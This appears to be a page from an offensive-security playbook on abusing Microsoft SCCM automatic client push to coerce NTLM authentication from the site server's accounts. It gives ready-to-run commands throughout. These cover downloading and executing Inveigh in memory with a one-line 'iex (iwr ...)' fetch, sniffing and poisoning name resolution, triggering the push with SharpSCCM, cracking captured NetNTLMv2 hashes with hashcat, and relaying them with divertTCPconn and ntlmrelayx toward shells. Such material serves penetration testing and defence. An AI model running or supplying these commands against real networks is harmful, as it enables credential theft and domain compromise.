ELEVATE-2 - Client Push

Document Reference


It is possible to coerce NTLM authentication from a site servers push installation account and machine account. The NTLM authentication can either be cracked offline or relayed elsewhere for authentication.


  • SCCM automatic site assignment and automatic client push installation are enabled

  • PKI certificates aren’t required for client authentication

  • SMB Signing disabled (If relaying authentication)

  • Domain user credentials

  • Local Administrator (If performing from Windows)

  • Fallback to NTLM authentication is not explicitly disabled (default)

Credential Capture

Setup capture

Setup Inveigh or Invoke-Inveigh to sniff for network traffic (Local Admin Required)

# Binary

# Download
iex (iwr -usebasicparsing https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1)

# Execute
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -HTTPS Y -IP [Local IP>

Trigger client push installation

Trigger the client push on the site server, targeting the listening host. This process may take a couple of minutes to capture

# SharpSCCM
SharpSCCM.exe invoke client-push -sms [SMS Site IP] -sc [Site Code] -t [Listening IP]


hashcat.exe -m 5600 -a 0 -o hash.txt Wordlists\kaonashi14M.txt rules\best64.rule

Relay Authentication

ntlmrelayx Setup

Before setting up ntlmrelayx on Windows we need to divert SMB traffic on port 445 to an alternate port such as 8445 with divertTCPConn (Local Administrator Required)

divertTCPconn.exe 445 8445

Configure ntlmrelayx

ntlmrelayx.exe --smb-port 8445 -smb2support --smb-port 8445 -ts -t [Relay Target]

Trigger Push authentication then wait a minute or two to capture the authentication request.

SharpSCCM.exe invoke client-push -sms [Site Server] -sc [Site Code] -t [Relay IP]

Getting full shells on Windows

The below page demonstrates how to get full shells on Windows with Amnesiac and ntlmrelayx.


Defensive IDs

Last updated